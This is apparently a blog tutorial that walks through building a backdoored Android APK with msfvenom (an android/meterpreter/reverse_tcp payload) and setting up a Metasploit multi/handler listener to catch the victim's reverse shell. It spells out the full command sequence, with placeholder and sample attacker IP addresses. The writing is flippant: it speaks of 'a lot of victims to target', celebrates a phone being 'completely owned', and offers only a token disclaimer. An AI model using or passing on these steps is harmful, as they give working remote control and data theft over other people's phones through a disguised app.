How to Hack Android Smartphone Using Metasploit

Hello friends how are you? I hope everything is going great 😀 so what we will be talking about today is Hacking android smartphone using Metasploit.

Important : All the details shown in the article are only for educational purposes and we are not responsible for any of your acts.

Why Hack Android Phones?

So the first question that comes to our mind after hearing this is why in the world we would like to hack Android Phones? The answer to that question is really simple majority of the people out there are android users and you have a lot of victims to target 😀

But seriously don’t hack anyone’s device without their permission or you can get into a lot of trouble for doing android hacking.

What is Android?

According to Wikipedia:

Android is an operating sysytem based on Linux Kernel, and designed promarily for touchcreen mobile devices such as smartphones and tablet computers.

Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices

What is Metasploit?

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby.

To put it in simple words it is an Open Source Framework, a tool for creating exploits for the remote victims and it also has a whole list of exploits readily available in Metasploit Framework.

It is the favorite tools for security researchers and ethical hackers to perform their attacks. It is super simple to create different payloads for different Operating Systems and platforms.

Metasploit for Android Hacking?

What method will be using to hack the phone? We are going to create Backdoor and install that on Victims Phone.

What is Backdoor?

A Backdoor is a method or a way of bypassing authentication in product, computer etc. They are usually used for unauthorized access to a computer.

For Android, we are going to create an APK file with a backdoor in it. Android Application Package (APK) is the file format used to distribute and install application software onto the Google’s Android OS. It is similar to the MSI package or a Deb package in Linux based operating system.

Requirements:-

  1. Metasploit Framework (Pre-Installed in Kali Linux)
  2. Victims Android Smartphone (Unfortunately that is my phone)

Step By Step Hacking Android Phone Using Metasploit:

So now lets get into it.

  1. Open Terminal.
  2. We are going to use Metasploit Venom Framework to create the exploit/backdoor for this tutorial.
  3. Use this command to generate the exploit/Backdoor for the victim.
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk

Generate Android Payload using msfvenom

Let me explain the above Command so we are using msfvenom  as the exploit generator for and android using Meterpreter for the reverse connection to the attackers system. LHOST defines the attackers ip address where he will get the reverse connection from the victim. And same with the LPORT connection will be made on port 4444 and R > is used to generate the executable.

MSFVenom Payload

Now we are all ready for the next step as this payload use reverse_tcp so the attacker will be listening to the port specified in the payload for a reverse connection from the victim.

So now we need to set up handler to handle incoming connections to the port let’s do it.

[email protected]:~/# msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

Now we will listen to the connections which are being received on the attacker system.

set lhost 192.168.1.104

set lport 4444

exploit 

Remember that the LHOST & LPORT are going to be the attacker IP address and port to listen the reverse connection. and exploit to start listening.

Now as soon as the attacker installs the APK exploit/backdoor you will get the reverse meterpreter session on you terminal like this.

Here we have some information that we have extracted from the android system so the victims phone have been completely owned.

The successful hack dance  😈  😈

 

So after all this explanation what we have learned is never install apps from unknown sources 😀 or else you are completely screwed :3

Here is the Video Covering all the steps :-

 

If you had any questions do comment below and we will try our best to help you out. Do share with your friends.